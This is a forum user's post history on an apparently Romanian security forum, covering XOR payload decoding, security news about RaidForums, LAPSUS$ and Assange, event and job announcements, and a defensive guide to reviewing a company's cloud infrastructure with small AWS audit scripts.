Everything posted by Nytro


How we managed to hack the biggest Southeast Europe hackathon

Nytro replied to YKelyan's topic in Stiri securitate

Nice!

What kind of encoding is this? bxor?

Nytro replied to WarLord's topic in Reverse engineering & exploit development

Yes, it's XOR with the key shown at the bottom. You can paste it here: https://gchq.github.io/CyberChef/#recipe=From_Decimal('Comma',false)XOR({'option':'Latin1','string':'euzF8}gfab'},'Standard',false) The result is still further obfuscated after that, though.
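For anyone who prefers a script over CyberChef, here is a minimal Python sketch of the same two recipe steps (From Decimal with a comma delimiter, then XOR with a repeating Latin-1 key). The key is the one from the recipe above; the sample payload and the `xor_encode` helper are made up purely for the round-trip demonstration and are not the payload from the topic.

```python
from itertools import cycle


def xor_decode(decimal_csv: str, key: str) -> bytes:
    """Parse comma-separated decimal byte values and XOR them with a repeating key."""
    data = bytes(int(tok) for tok in decimal_csv.split(",") if tok.strip())
    key_bytes = key.encode("latin-1")
    return bytes(b ^ k for b, k in zip(data, cycle(key_bytes)))


def xor_encode(plaintext: bytes, key: str) -> str:
    """Inverse helper (hypothetical, only used to build a demo payload)."""
    key_bytes = key.encode("latin-1")
    return ",".join(str(b ^ k) for b, k in zip(plaintext, cycle(key_bytes)))


KEY = "euzF8}gfab"  # key taken from the CyberChef recipe in the post
sample = xor_encode(b"hello world", KEY)  # made-up payload, not the real one
print(xor_decode(sample, KEY))
```

Since XOR is its own inverse, the same function decodes and encodes; whatever comes out for the real payload would still need the extra deobfuscation mentioned above.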

What kind of encoding is this? bxor?

Nytro replied to WarLord's topic in Reverse engineering & exploit development

It matters how that payload is processed. Most likely it has been modified (encrypted, encoded, XORed, whatever), but to do anything useful with it you have to reconstruct it. More precisely, you need to see what the binary/exploit does with this payload before using it. It doesn't look like shellcode.

What kind of encoding is this? bxor?

Nytro replied to WarLord's topic in Reverse engineering & exploit development

Hi, is this the beginning part? It doesn't look like anything common.



Blocking registration by IP address on IPS Community Suite

Nytro replied to CD-RAY's topic in Discutii incepatori

-

Blocking registration by IP address on IPS Community Suite

Nytro replied to CD-RAY's topic in Discutii incepatori

Bots get in here all the time too and post garbage: click on the profile, Flag as Spammer, problem solved.

Wed, May 25, 2022, 3:00 PM - 6:00 PM (your local time)

To our dearest community: We are very happy to announce that we are restarting our meetup series. As you know, our team cares deeply about sharing information, tooling and knowledge as openly as possible. Therefore, we are proud to be able to have these specialists in cybersecurity share what they have learned on the frontlines:

18:00 - 18:45 Tiberiu Boros, Andrei Cotaie - Living off the land

In security, "Living off the Land" (LotL or LOTL)-type attacks are not new. Bad actors have been using legitimate software and functions to target systems and carry out malicious attacks for many years. And although it's not novel, LotL is still one of the preferred approaches even for highly skilled attackers. Why? Because hackers tend not to reinvent the wheel and prefer to keep a low profile, i.e., leave no "footprints," such as random binaries or scripts on the system.

Interestingly, these stealthy moves are exactly why it's often very difficult to determine which of these actions come from a valid system administrator and which from an attacker. It's also why static rules can trigger so many false positives and why compromises can go undetected. Most antivirus vendors do not treat executed commands (from a syntax and vocabulary perspective) as an attack vector, and most of the log-based alerts are static, limited in scope, and hard to update. Furthermore, classic LotL detection mechanisms are noisy and somewhat unreliable, generating a high number of false positives, and because typical rules grow organically, it becomes easier to retire and rewrite the rules rather than maintain and update them.

The Threat Hunting team at Adobe set out to help fix this problem. Using open source and other representative incident data, we developed a dynamic and high-confidence program, called LotL Classifier, and we have recently open sourced it to the broader security community. In this webcast you will learn about the LotL Classifier, intended usage and best practices, and how you can obtain and contribute to the project.

18:50 - 19:35 Ciprian Bejean - Lessons learned when playing with file infectors

Linkedin: https://www.linkedin.com/events/bsidesbucharestonlinemeetup6927924413371678720/
Zoom: https://us05web.zoom.us/j/83643751520?pwd=UDU0RVE0UmZjWHN2UnJPR095SUxpQT09


British court rules to extradite Julian Assange to the US, where he will be tried for espionage

20.04.2022 14:28

Julian Assange in 2017, when he was still inside the Ecuadorian embassy in London. Photo: Getty Images

A British court has formally authorized the extradition of WikiLeaks founder Julian Assange to the US. The American authorities want to try Assange for espionage, AFP reports.

Westminster Magistrates' Court in London formally issued an extradition order for Assange, and it is now up to Home Secretary Priti Patel to approve it, although the defence lawyers can still appeal to the High Court.

Caught in a long-running legal saga, the Australian is wanted by the US justice system, which wants to try him for releasing, starting in 2010, more than 700,000 classified documents on US military and diplomatic activities, especially in Iraq and Afghanistan, according to Agerpres.

In 2010 and 2011, WikiLeaks published thousands of classified military and diplomatic documents about the wars in Afghanistan and Iraq. US prosecutors said the disclosures endangered the lives of hundreds of people and that Assange was aware of this.

Prosecuted under an anti-espionage law, he faces 175 years in prison, in a case denounced by human rights organizations as a serious attack on press freedom.

On March 14, Julian Assange saw one of his last hopes of avoiding extradition disappear when the UK Supreme Court refused to hear his appeal.

Editor: M.L.

Source: https://www.digi24.ro/stiri/externe/justitia-britanica-a-decis-extradarea-lui-julian-assange-in-sua-unde-va-fi-judecat-pentru-spionaj-1912295


RaidForums hacking forum seized by police, owner arrested

By Ionut Ilascu, April 12, 2022

The RaidForums hacker forum, used mainly for trading and selling stolen databases, has been shut down and its domain seized by U.S. law enforcement during Operation TOURNIQUET, an action coordinated by Europol that involved law enforcement agencies in several countries. RaidForums' administrator and two of his accomplices have been arrested, and the infrastructure of the illegal marketplace is now under the control of law enforcement.

14-year old started RaidForums

The administrator and founder of RaidForums, Diogo Santos Coelho of Portugal, aka Omnipotent, was arrested on January 31 in the United Kingdom and is facing criminal charges. He has been in custody since the arrest, pending the resolution of his extradition proceedings. The U.S. Department of Justice today says that Coelho is 21 years old, which means that he was just 14 when he launched RaidForums in 2015.

Three domains hosting RaidForums have been seized: "raidforums.com," "Rf.ws," and "Raid.Lol." According to the DoJ, the marketplace offered for sale more than 10 billion unique records from hundreds of stolen databases that impacted people residing in the U.S. In a separate announcement today, Europol says that RaidForums had more than 500,000 users and "was considered one of the world's biggest hacking forums".

"This marketplace had made a name for itself by selling access to high-profile database leaks belonging to a number of US corporations across different industries. These contained information for millions of credit cards, bank account numbers and routing information, and the usernames and associated passwords needed to access online accounts" - Europol

Taking down the forum and its infrastructure is the result of one year of planning between law enforcement authorities in the United States, the United Kingdom, Sweden, Portugal, and Romania. It is unclear how long the investigation took, but the collaboration between law enforcement agencies allowed authorities to paint a clear picture of the roles different individuals had within RaidForums. The European law enforcement agency shared few details in its press release but notes that the people who kept RaidForums running worked as administrators and money launderers, stole and uploaded data, and bought the stolen information.

Coelho allegedly controlled RaidForums since January 1, 2015, the indictment reveals, and he operated the site with the help of a few administrators, organizing its structure to promote buying and selling stolen goods. To make a profit, the forum charged fees for various membership tiers and sold credits that allowed members to access privileged areas of the site or stolen data dumped on the forum. Coelho also acted as a trusted middleman between parties making a transaction, to provide confidence that buyers and sellers would honor their agreement.

Members become suspicious in February

Threat actors and security researchers first suspected that RaidForums was seized by law enforcement in February, when the site began showing a login form on every page. However, when attempting to log into the site, it simply showed the login page again. This led researchers and forum members to believe that the site was seized and that the login prompt was a phishing attempt by law enforcement to gather threat actors' credentials.

On February 27th, 2022, the DNS servers for raidforums.com were suddenly changed to the following servers:

jocelyn.ns.cloudflare.com
plato.ns.cloudflare.com

As these DNS servers were previously used with other sites seized by law enforcement, including weleakinfo.com and doublevpn.com, researchers believed that this added further support that the domain was seized.

Before becoming the hackers' favorite place to sell stolen data, RaidForums had a more humble beginning and was used for organizing various types of electronic harassment, which included swatting targets (making false reports leading to armed law enforcement intervention) and "raiding," which the DoJ describes as "posting or sending an overwhelming volume of contact to a victim's online communications medium."

The site became well-known over the past couple of years. It was frequently used by ransomware gangs and data extortionists to leak data as a way to pressure victims into paying a ransom, and was used by both the Babuk ransomware gang and the Lapsus$ extortion group in the past.

The marketplace has been active since 2015 and it was for a long time the shortest route for hackers to sell stolen databases or share them with members of the forum. Sensitive data traded on the forum included personal and financial information such as bank routing and account numbers, credit cards, login information, and social security numbers.

While many cybercrime forums catered to Russian-speaking threat actors, RaidForums stood out as being the most popular English-speaking hacking forum. After Russia invaded Ukraine, and many threat actors began taking sides, RaidForums announced that they were banning any member who was known to be associated with Russia.

Source: https://www.bleepingcomputer.com/news/security/raidforums-hacking-forum-seized-by-police-owner-arrested/


The Role...

Individual with a background in development, capable of driving the security engineering needs of the application security aspects of products built in-house and/or integrated from 3rd parties, and ensuring alignment with the PPB technology strategy.

Work closely with the other Security Engineering areas (Testing & Cloud), the wider Security team and project teams throughout the organization to ensure the adoption of best-of-breed Security Engineering practices, so that security vulnerabilities are detected and acted upon as early as possible in the project lifecycle.

In addition to ensuring the continuous and reliable availability and performance of the existing security tools (both commercial and internally developed), the role also involves their continuous improvement (namely to cover emerging technologies/frameworks) and the coordination and hands-on development of the internally developed tools to meet new business and governance needs.

What you'll be doing...

- Liaise with business stakeholders to ensure all business projects are assessed from a security point of view and input is provided so that security requirements are implemented before the project is delivered;
- Develop and maintain engineering components autonomously (Python) that enable the Application Security team to ensure internally developed code follows security best practices;
- Research and evaluate emerging technologies to detect, mitigate, triage, and remediate application security defects across the enterprise;
- Understand the architecture of production systems, including identifying the security controls in place and how they are used;
- Act as part of the InfoSec Engineering team, coordinating and actively participating in the timely delivery of agreed pieces of work;
- Ensure the continuous and reliable availability and performance of the existing security tools (both commercial and internally developed);
- Support the engineering needs of the InfoSec Engineering and wider Security function;
- Build strong business relationships with partners inside and outside PPB to understand mutual goals, requirements, options and solutions to complex or intangible application security issues;
- Lead and coach junior team members, supporting them technically in their development;
- Incident response (security related): able to perform triage and, with support from other business functions, provide mitigation advice;
- Able to suggest and implement security controls for both public and private clouds;
- Maintain and develop components to support application security requirements in Continuous Delivery methodologies;
- Research, maintain and integrate Static Code Analysis tools (SAST) according to the company's requirements;
- Plan and develop deliverables according to SCRUM.

What We're Looking For...

- Good written and verbal communication skills;
- A team player, who strives to maximize team and departmental performance;
- Resolves and/or escalates issues in a timely fashion;
- Knowledge sharing and interest in growing other team members;
- Effectively manages stakeholder interaction and expectations;
- Develops lasting relationships with stakeholders and key personnel across security;
- Influences business stakeholders to develop a secure mindset;
- Interacts with development teams to influence and expand their secure mindset.

Apply: https://apply.betfairromania.ro/vacancy/senior-infosec-engineer-6056-porto/6068/description/

If you are interested, send me a PM and I will put you in touch with the right people.


REGISTRATION

Activity calendar

- Contest registration: starting 01/03/2022
- Training stage: starting 04/04/2022
- Individual contest: 06/05/2022 - 08/05/2022 (also the end of registration)
- Team contest: 20/05/2022 - 22/05/2022
- Individual performance report: 31/05/2022

More details about the activity calendar, here.

Prizes

- cash prizes or gadgets
- diplomas for participation or for your position in the overall ranking
- your results count toward the #ROEduCyberSkills ranking
- an individual performance report recognized by companies and other organizations - details, here

How can I sign up?

Registration is free. To be eligible for prizes and for the #ROEduCyberSkills ranking, you must be registered by the end of the individual round. You will need this password when registering: parola-unr22-812412412

Where can I talk to the other participants?

To join the Discord group, where we will post announcements and where you can interact with the mentors, you need to:

- use this invitation to get access to the "UNR22" section
- send the bot @JDB the message "/ticket 8xu4tR7jGN", if you are already a member of the official CyberEDU.ro Discord channel, as in this screenshot

Details: https://unbreakable.ro/inregistrare


7 Suspected Members of LAPSUS$ Hacker Gang, Aged 16 to 21, Arrested in U.K.

March 25, 2022, Ravie Lakshmanan

The City of London Police has arrested seven teenagers between the ages of 16 and 21 for their alleged connections to the prolific LAPSUS$ extortion gang that's linked to a recent burst of attacks targeting NVIDIA, Samsung, Ubisoft, LG, Microsoft, and Okta.

The development, which was first disclosed by BBC News, comes after a report from Bloomberg revealed that a 16-year-old Oxford-based teenager is the mastermind of the group. It's not immediately clear if the minor is one among the arrested individuals. The said teen, under the online alias White or Breachbase, is alleged to have accumulated about $14 million in Bitcoin from hacking.

"I had never heard about any of this until recently," the teen's father was quoted as saying to the broadcaster. "He's never talked about any hacking, but he is very good on computers and spends a lot of time on the computer. I always thought he was playing games."

According to security reporter Brian Krebs, the "ringleader" purchased Doxbin last year, a portal for sharing personal information of targets, only to relinquish control of the website back to its former owner in January 2022, but not before leaking the entire Doxbin dataset to Telegram. This prompted the Doxbin community to retaliate by releasing personal information on "WhiteDoxbin," including his home address and videos purportedly shot at night outside his home in the U.K.

What's more, the hacker crew has actively recruited insiders via social media platforms such as Reddit and Telegram since at least November 2021 before it surfaced on the scene in December 2021. At least one member of the LAPSUS$ cartel is also believed to have been involved with a data breach at Electronic Arts last July, with Palo Alto Networks' Unit 42 uncovering evidence of extortion activity aimed at U.K. mobile phone customers in August 2021.

LAPSUS$, over a mere span of three months, accelerated their malicious activity, swiftly rising to prominence in the cyber crime world for its high-profile targets and maintaining an active presence on the messaging app Telegram, where it has amassed 47,000 subscribers.

Microsoft characterized the group as an "unorthodox" group that "doesn't seem to cover its tracks" and that uses a unique blend of tradecraft, which couples phone-based social engineering and paying employees of target organizations for access to credentials. If anything, LAPSUS$' brazen approach to striking companies with little regard for operational security measures appears to have cost them dear, leaving behind a forensic trail that led to their arrests.

The last message from the group came on Wednesday when it announced that some of its members were taking a week-long vacation: "A few of our members has a vacation until 30/3/2022. We might be quiet for some times. Thanks for understand us - we will try to leak stuff ASAP."

Source: https://thehackernews.com/2022/03/7-suspected-members-of-lapsus-hacker.html


What to look for when reviewing a company's infrastructure

March 24, 2022
Tags: Cloud, Kubernetes, Serverless, Strategy

Contents:
- The challenge of prioritization
- The review process
- Phase 1: Cloud Providers
  - Stage 1: Identify the primary CSP
  - Stage 2: Understand the high-level hierarchy
  - Stage 3: Understand what is running in the Accounts
  - Stage 4: Understand the network architecture
  - Stage 5: Understand the current IAM setup
  - Stage 6: Understand the current monitoring setup
  - Stage 7: Understand the current secrets management setup
  - Stage 8: Identify existing security controls
  - Stage 9: Get the low-hanging fruits
- Phase 2: Workloads
  - Stage 1: Understand the high-level business offerings
  - Stage 2: Identify the primary tech stack
  - Stage 3: Understand the network architecture
  - Stage 4: Understand the current IAM setup
  - Stage 5: Understand the current monitoring setup
  - Stage 6: Understand the current secrets management setup
  - Stage 7: Identify existing security controls
  - Stage 8: Get the low-hanging fruits
- Phase 3: Code
  - Stage 1: Understand the code's structure
  - Stage 2: Understand the adoption of Infrastructure as Code
  - Stage 3: Understand how CI/CD is set up
  - Stage 4: Understand how the CI/CD platform is secured
- Let's put it all together
- Conclusions

Early last year, I wrote "On Establishing a Cloud Security Program", outlining some advice that can be undertaken to establish a cloud security program aimed at protecting a cloud native, service provider agnostic, container-based offering. The result can be found in a micro-website which contains the list of controls that can be rolled out to establish such a cloud security program: A Cloud Security Roadmap Template.

Following that post, one question I got asked was: "That's great, but how do you even know what to prioritize?"

The challenge of prioritization

And that's true for many teams, from the security team of a small but growing start-up to a CTO or senior engineer at a company with no cloud security team trying to either get things started or improve what they have already.

Here I want to tackle precisely the challenge many (new) teams face: getting up to speed in a new environment (or company altogether) and finding its most critical components.

This post, part of the "Cloud Security Strategies" series, aims to provide a structured approach to review the security architecture of a multi-cloud SaaS company, having a mix of workloads (from container-based, to serverless, to legacy VMs). The outcome of this investigation can then be used to inform both subsequent security reviews and prioritization of the Cloud Security Roadmap.

The review process

There are multiple situations in which you might face a (somewhat completely) new environment:

- You are starting a new job/team: Congrats! You are the first engineer in a newly spun-up team.
- You are going through a merger or acquisition: Congrats (I think?)! You now have a completely new setup to review before integrating it with your company's.
- You are delivering a consulting engagement: This is different from the previous 2, as this usually means you are an external consultant. Although the rest of the post is more tailored towards internal teams, the same concepts can also be used by consultancies.

So, where do you start? What kind of questions should you ask yourself? What information is crucial to obtain? Luckily, abstraction works in our favour.

[Figure: Abstraction Levels]

We can split the process into different abstraction levels (or "Phases"), from cloud, to workloads, to code:

- Start from the Cloud Providers.
- Continue by understanding the technology powering the company's Workloads.
- Complete by mapping the environments and workloads to their originating source Code (a.k.a. code provenance).

[Figure: The 3 Phases of the Review]

Going through this exercise allows you to familiarise yourself with a new environment and, as a good side-effect, organically uncover its security risks. These risks will then be essential to put together a well-thought-out roadmap that addresses both short-term goals (a.k.a. extinguishing the fires) and long-term goals (a.k.a. improving the overall security and maturity of the organization).

Once you have a clear picture of what you need to secure, you can then prioritize accordingly. It is important to stress that you need to understand how something works before securing (or attempting to secure) it. Let me repeat it: you can't secure what you don't understand.

A note on breadth vs depth

A word of caution: avoid rabbit holes; not only can they be a huge time sink, but they are also an inefficient use of limited time. You should put your initial focus on getting broad coverage of the different abstraction levels (Cloud Providers, Workloads, Code). Only after you complete the review process will you have enough context to determine where additional investigation is required.

Phase 1: Cloud Providers

Cloud Service Providers (or "CSPs" in short) provide the first layer of abstraction, as they are the primary collection of environments and resources. Hence, the main goal for this phase is to understand the overall organizational structure of the infrastructure.

Stage 1: Identify the primary CSP

In this post, we target a multi-cloud company with resources scattered across multiple CSPs. Since it wouldn't be technically feasible to tackle everything simultaneously, start by identifying the primary cloud provider, where Production is, and start from it. In fact, although it is common to have "some" Production services in another provider (maybe a remnant of a past, and incomplete, migration), it is rare for a company to have an equal split of Production services among multiple CSPs (and if someone claims so, verify it is the case). Core services are often hosted in one provider, while other CSPs might host just some ancillary services.

Once identified, consider this provider as your primary target. Go through the steps listed below, and only repeat them for the other CSPs at the end.

A note on naming conventions: For the sake of simplicity, for the rest of this post I will use the term "Account" to refer both to AWS Accounts and GCP Projects.

Stage 2: Understand the high-level hierarchy

[Figure: General Organizational Layouts for AWS and GCP]

- How many Organizations does the company have?
- How is each Organization designed? If AWS, what do the Organizational Units (OUs) look like? If GCP, what about the Folder hierarchy?
- Is there a clear split between environment types? (i.e., Production, Staging, Testing, etc.)
- Which Accounts are critical? (i.e., which ones contain critical data or workloads?) If you are lucky, has someone already compiled a risk rating of the Accounts?
- How are new Accounts created? Are they created manually or automatically? Are they automatically onboarded onto security tools available to the company?

The quickest way to start getting a one-off list of Accounts (as well as getting answers for the questions above) is through the Organizations page of your Management AWS Account, or the Cloud Resource Manager of your GCP Organization. You can see mine below (yes, my AWS Org is way more organized than my 2 GCP projects):

[Figure: Sample Organizations for AWS and GCP]

Otherwise, if you need some inspiration for more "creative" ways to get a list of all your Accounts, you can refer to the "How to inventory AWS accounts" blog post from Scott Piper.
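As a rough illustration of the one-off Account list described in Stage 2, the sketch below walks the AWS Organizations `list_accounts` paginator and attaches a guessed environment type to each Account. It is not from the original article: the `ENV_HINTS` naming convention and the `guess_environment` and `inventory` helpers are hypothetical, and the client is passed in so the logic can be exercised without credentials.

```python
from typing import Any, Dict, List

# Hypothetical naming convention; adjust to whatever the organization actually uses.
ENV_HINTS = {"prod": "production", "stag": "staging", "test": "testing", "dev": "development"}


def list_accounts(org_client: Any) -> List[Dict[str, str]]:
    """Collect every account visible to an AWS Organizations client.

    org_client is expected to behave like boto3.client("organizations"),
    i.e. expose get_paginator("list_accounts").
    """
    accounts = []
    for page in org_client.get_paginator("list_accounts").paginate():
        for acct in page.get("Accounts", []):
            accounts.append(
                {"id": acct["Id"], "name": acct["Name"], "status": acct["Status"]}
            )
    return accounts


def guess_environment(account_name: str) -> str:
    """Guess the environment type from the account name (substring heuristic only)."""
    lowered = account_name.lower()
    for hint, env in ENV_HINTS.items():
        if hint in lowered:
            return env
    return "unknown"


def inventory(org_client: Any) -> List[Dict[str, str]]:
    """One-off inventory: accounts plus a guessed environment, sorted by name."""
    rows = [
        dict(acct, environment=guess_environment(acct["name"]))
        for acct in list_accounts(org_client)
    ]
    return sorted(rows, key=lambda row: row["name"])


# Usage against a real organization (needs credentials for the management account):
#   import boto3
#   for row in inventory(boto3.client("organizations")):
#       print(row)
```

The environment guess is only a starting point for the "is there a clear split between environment types?" question; Accounts that come back as "unknown" are the ones worth asking the platform team about.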
Improving from the one-off list, you could later consider adding some automation to discover and document Accounts automatically. One example of such a tool is cartography. In my Continuous Visibility into Ephemeral Cloud Environments series, I've personally blogged about this:

- Mapping Moving Clouds: How to stay on top of your ephemeral environments with Cartography
- Tracking Moving Clouds: How to continuously track cloud assets with Cartography

Stage 3: Understand what is running in the Accounts

Here the goal is to get a rough idea of what kind of technologies are involved:

- Is the company container-heavy? (e.g., Kubernetes, ECS, etc.)
- Is it predominantly serverless? (e.g., Lambda, Cloud Function, etc.)
- Is it relying on "legacy" VM-based workloads? (e.g., vanilla EC2)

If you have access to Billing, this should be enough to understand which services are the biggest spenders. The "Monthly spend by service" view of AWS Cost Explorer, or equivalently "Cost Breakdown" of GCP Billing, can provide an excellent snapshot of the most used services in the Organization. Otherwise, if you don't (and can't) have access to Billing, ask your counterpart teams (usually platform/SRE teams).

[Figure: Monthly spend by service view of AWS Cost Explorer]

(If you are interested in cost-related strategies, CloudSecDocs has a specific section on references to best practices around Cost Optimization.)

In addition, both AWS Config (if enabled) and GCP Cloud Asset Inventory (by default) provide an aggregated view of all assets (and their metadata) within an Account or Organization. This view can be beneficial to understand, at a glance, the primary technologies being used.

[Figure: AWS Config and GCP Cloud Asset Inventory]

At the same time, it is crucial to start getting an idea around data stores:

- What kind of data is identified by the business as the most sensitive and critical to secure?
- What type of data (e.g., secrets, customer data, audit logs, etc.) is stored in which Account?
- How is data rated according to the company's data classification standard (if one exists)?

Stage 4: Understand the network architecture

In this stage, the goal is to understand what the network architecture looks like:

- What are the main entry points into the infrastructure? What services and components are Internet-facing and can receive unsolicited (a.k.a. untrusted and potentially malicious) traffic?
- How do customers get access to the system? Do they have any network access? If so, do they have direct network access, maybe via VPC peering?
- How do engineers get access to the system? Do they have direct network access? Identify how engineering teams can access the Cloud Providers' console and how they can programmatically interact with their APIs (e.g., via command-line utilities like AWS CLI or gcloud CLI).
- How are Accounts connected to each other? Is there any Account separation in place? Is there any VPC peering or shared VPCs between different Accounts?
- How is firewalling implemented? How are Security Groups and Firewall Rules defined?
- How is the edge protected? Is anything like Cloudflare used to protect against DDoS and common attacks (via a WAF)?
- How is DNS managed? Is it centralized? What are the principal domains associated with the company?
- Is there any hybrid connectivity with any on-prem data centres? If so, how is it set up and secured? (For those interested, CloudSecDocs has a specific section on references around Hybrid Connectivity.)

[Figure: Multi-account, multi-VPC architecture - Courtesy of Amazon]

There is no easy way to obtain this information. If you are lucky, your company might have up-to-date network diagrams that you can consult. Otherwise, you'll have to make an effort to interview different stakeholders/teams to try to extract the tacit knowledge they might have.
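For the firewalling and Internet-facing questions in Stage 4, part of the picture can be pulled from the provider's API while the interviews are being scheduled. The following is a minimal sketch, not the article's method: it scans records shaped like the `SecurityGroups` list returned by EC2 `describe_security_groups` and reports ingress rules open to any address. The sample data and the `internet_facing_rules` helper name are made up for illustration.

```python
from typing import Any, Dict, List, Optional, Tuple

OPEN_CIDRS = {"0.0.0.0/0", "::/0"}

Finding = Tuple[str, Optional[str], Optional[int], Optional[int]]


def internet_facing_rules(security_groups: List[Dict[str, Any]]) -> List[Finding]:
    """Return (group id, protocol, from port, to port) for ingress rules open to the world."""
    findings = []
    for group in security_groups:
        for perm in group.get("IpPermissions", []):
            cidrs = [r.get("CidrIp") for r in perm.get("IpRanges", [])]
            cidrs += [r.get("CidrIpv6") for r in perm.get("Ipv6Ranges", [])]
            if any(cidr in OPEN_CIDRS for cidr in cidrs):
                findings.append(
                    (
                        group["GroupId"],
                        perm.get("IpProtocol"),
                        perm.get("FromPort"),  # absent when the protocol is "-1" (all traffic)
                        perm.get("ToPort"),
                    )
                )
    return findings


# Made-up sample in the shape of describe_security_groups()["SecurityGroups"].
SAMPLE_GROUPS = [
    {
        "GroupId": "sg-web",
        "IpPermissions": [
            {"IpProtocol": "tcp", "FromPort": 443, "ToPort": 443,
             "IpRanges": [{"CidrIp": "0.0.0.0/0"}], "Ipv6Ranges": []},
        ],
    },
    {
        "GroupId": "sg-db",
        "IpPermissions": [
            {"IpProtocol": "tcp", "FromPort": 5432, "ToPort": 5432,
             "IpRanges": [{"CidrIp": "10.0.0.0/16"}], "Ipv6Ranges": []},
        ],
    },
]

for finding in internet_facing_rules(SAMPLE_GROUPS):
    print(finding)
```

An open rule is not automatically a problem (a public web tier is expected to have one); the list is mainly a prompt for which entry points to ask about.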
For this specific reason, this stage might become one of the most time-consuming parts of the entire review process (and often the one skipped for this exact reason), especially if no up-to-date documentation is available. Nonetheless, this stage is the one that might bring the most significant rewards in the long run: as a (Cloud) Security team, you should be confident in your knowledge of how data flows within your systems. This knowledge will then be critical for providing accurate and valuable recommendations and risk ratings going forward.

Stage 5: Understand the current IAM setup

Identity and Access Management, or IAM in short, is the apex of the headaches for security teams. In this stage, the goal is to understand how authentication and authorization to cloud providers are currently set up. The problem, though, is twofold, as you'll have to tackle this not only for human (i.e., engineers) but also for automated (i.e., workloads, CI jobs, etc.) access.

[Figure: Cross Account Auditing in AWS]

Concerning human access, the previous stage started looking at how engineering teams connect to Cloud Providers. Now is the time to expand on this:

- Where are identities defined? Is an Identity Provider (like G Suite, Okta, or AD) being used?
- Are the identities being federated in the Cloud Provider from the Identity Provider? Are the identities being synced automatically from the Identity Provider? Is SSO being used?
- Are named users being used as a common practice, or are roles with short-lived tokens preferred? Here the point is not to do a full IAM audit but to understand the standard practice.
- For high-privileged accounts, are good standards enforced? (e.g., password policy, MFA - preferably hardware)
- How is authorization enforced? Is the principle of least privilege generally followed, or are overly permissive (non fine-tuned) policies usually used? For example, CloudSecDocs has summaries of best practices for IAM in both AWS and GCP.
- How is Role-Based Access Control (RBAC) used? How is it set up, enforced, and audited?
- Is there a documented process describing how access requests are managed and granted?
- Is there a documented process describing how access deprovisioning is performed during offboarding?

For automated access:

- How do Accounts interact with each other? Are there any cross-Account permissions?
- Are long-running (static) keys and service accounts generally used, or are short-lived tokens (i.e., STS) usually preferred?
- How is authorization enforced? Is the principle of least privilege generally followed, or are overly permissive (non fine-tuned) policies usually used?

[Figure: Visualization of Cross-Account Role Access, obtained via Cartography]

It is important to stress that you won't have time to go into reviewing every single policy at this stage, at least for any decently-sized environment. What you should be able to do, though, is get a grasp of the company's general trends and overall maturity level. We will tackle a proper security review later.

Stage 6: Understand the current monitoring setup

Next, special attention should be put on the current setup for collecting, aggregating, and analyzing security logs across the entire estate:

- Are security-related logs collected at all?
- If so, which services offered by the Cloud Providers are already being leveraged? For AWS, are at least CloudTrail, CloudWatch, and GuardDuty enabled? For GCP, what about Cloud Monitoring and Cloud Logging?
- What kind of logs are already being ingested?
- Where are the logs collected? Are logs from different Accounts all ingested in the same place?
- What's the retention policy for security-related logs?
- How are logs analyzed? Is a SIEM being used?
- Who has access to the SIEM and the raw storage of logs?
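As one way to make the "are security-related logs collected at all?" question concrete for AWS, the sketch below summarizes obvious gaps in a list of trail records shaped like the `trailList` returned by CloudTrail `describe_trails`. The particular checks (multi-region, organization-wide, log file validation) are my own illustrative selection, not a checklist from the article, and the `trail_gaps` helper and sample data are hypothetical.

```python
from typing import Any, Dict, List


def trail_gaps(trails: List[Dict[str, Any]]) -> List[str]:
    """Return human-readable gaps for records shaped like describe_trails()['trailList']."""
    if not trails:
        return ["no CloudTrail trails found"]
    gaps = []
    if not any(t.get("IsMultiRegionTrail") for t in trails):
        gaps.append("no multi-region trail")
    if not any(t.get("IsOrganizationTrail") for t in trails):
        gaps.append("no organization-wide trail")
    for trail in trails:
        if not trail.get("LogFileValidationEnabled"):
            gaps.append(f"log file validation disabled on {trail.get('Name', '?')}")
    return gaps


# Made-up sample data for demonstration.
SAMPLE_TRAILS = [
    {"Name": "main", "IsMultiRegionTrail": True, "IsOrganizationTrail": False,
     "LogFileValidationEnabled": True, "S3BucketName": "example-logs"},
    {"Name": "legacy", "IsMultiRegionTrail": False, "IsOrganizationTrail": False,
     "LogFileValidationEnabled": False, "S3BucketName": "example-legacy-logs"},
]

for gap in trail_gaps(SAMPLE_TRAILS):
    print(gap)
```

Comparing the `S3BucketName` values across Accounts is a quick follow-up for the "are logs from different Accounts all ingested in the same place?" question.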
For some additional pointers, in my Continuous Visibility into Ephemeral Cloud Environments series, I’ve blogged about what could (and should) be logged: Security Logging in Cloud Environments - AWS Security Logging in Cloud Environments - GCP Architecture Diagram - Security Logging in AWS and GCP Then, focus on the response processes: Are any Intrusion Detection systems deployed? Are any Data Loss Prevention systems deployed? Are there any processes and playbooks to follow in case of an incident? Are there any processes to detect credential compromise situations? Are there any playbooks or automated tooling to contain tainted resources? Are there any playbooks or automated tooling to aid in forensic evidence collection for suspected breaches? Stage 7: Understand the current secrets management setup In this stage, the goal is to understand how secrets are generated and managed within the infrastructure: How are new secrets generated when needed? Manually or automatically? Where are secrets stored? Is a secrets management solution (like HashiCorp Vault, AWS Secrets Manager, or GCP Secret Manager) currently used? Are processes around secrets management defined? What about rotation and revocation of secrets? High-Level Overview of Vault Integrations For additional pointers, the Secrets Management section of CloudSecDocs has references to some other solutions in this space. Once again, resist the urge to start “fixing” things for now and keep looking and documenting. Stage 8: Identify existing security controls In this stage, the goal is to understand which controls have already been implemented, maybe by a previous iteration of the Security team, and can already be leveraged: What security boundaries are defined? For example, are Service Control Policies (AWS) or Organizational Policies (GCP) used? What off-the-shelf services offered by Cloud Providers are being used? For AWS, what “Security, Identity, and Compliance” services are enabled? 
